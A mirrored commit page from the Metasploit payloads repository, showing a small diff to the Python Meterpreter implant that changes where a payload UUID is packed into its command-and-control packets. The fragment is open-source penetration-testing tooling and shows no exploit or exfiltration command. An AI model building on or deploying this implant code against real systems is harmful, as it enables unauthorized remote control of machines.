github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-03-24 18:16:24 +01:00
Code Releases Activity

Fix python meterp UUID sending

Browse Source
This commit is contained in:
OJ 2016-10-27 02:58:54 +10:00
parent 8cbfcbfcc4
commit 1ebff41fed
No known key found for this signature in database
GPG Key ID: D5DC61FB93260597
1 changed files with 4 additions and 1 deletions

5
python/meterpreter/meterpreter.py

@ -739,7 +739,6 @@ class PythonMeterpreter(object):
return pkt return pkt
def send_packet(self, packet): def send_packet(self, packet):
packet += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
send_succeeded = self.transport.send_packet(packet) send_succeeded = self.transport.send_packet(packet)
if not send_succeeded and self.transport.should_retire: if not send_succeeded and self.transport.should_retire:
self.transport_change() self.transport_change()
@ -820,6 +819,7 @@ class PythonMeterpreter(object):
client_channel_id = self.add_channel(MeterpreterSocketClient(client_sock)) client_channel_id = self.add_channel(MeterpreterSocketClient(client_sock))
pkt = struct.pack('>I', PACKET_TYPE_REQUEST) pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'tcp_channel_open') pkt += tlv_pack(TLV_TYPE_METHOD, 'tcp_channel_open')
pkt += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, client_channel_id) pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, client_channel_id)
pkt += tlv_pack(TLV_TYPE_CHANNEL_PARENTID, channel_id) pkt += tlv_pack(TLV_TYPE_CHANNEL_PARENTID, channel_id)
pkt += tlv_pack(TLV_TYPE_LOCAL_HOST, inet_pton(channel.family, server_addr[0])) pkt += tlv_pack(TLV_TYPE_LOCAL_HOST, inet_pton(channel.family, server_addr[0]))
@ -831,6 +831,7 @@ class PythonMeterpreter(object):
if data: if data:
pkt = struct.pack('>I', PACKET_TYPE_REQUEST) pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write') pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
pkt += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id) pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt += tlv_pack(TLV_TYPE_CHANNEL_DATA, data) pkt += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
pkt += tlv_pack(TLV_TYPE_LENGTH, len(data)) pkt += tlv_pack(TLV_TYPE_LENGTH, len(data))
@ -844,6 +845,7 @@ class PythonMeterpreter(object):
self.interact_channels.remove(channel_id) self.interact_channels.remove(channel_id)
pkt = struct.pack('>I', PACKET_TYPE_REQUEST) pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_close') pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_close')
pkt += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id()) pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id) pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt = struct.pack('>I', len(pkt) + 4) + pkt pkt = struct.pack('>I', len(pkt) + 4) + pkt
@ -1107,6 +1109,7 @@ class PythonMeterpreter(object):
resp = struct.pack('>I', PACKET_TYPE_RESPONSE) resp = struct.pack('>I', PACKET_TYPE_RESPONSE)
method_tlv = packet_get_tlv(request, TLV_TYPE_METHOD) method_tlv = packet_get_tlv(request, TLV_TYPE_METHOD)
resp += tlv_pack(method_tlv) resp += tlv_pack(method_tlv)
resp += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
handler_name = method_tlv['value'] handler_name = method_tlv['value']
if handler_name in self.extension_functions: if handler_name in self.extension_functions: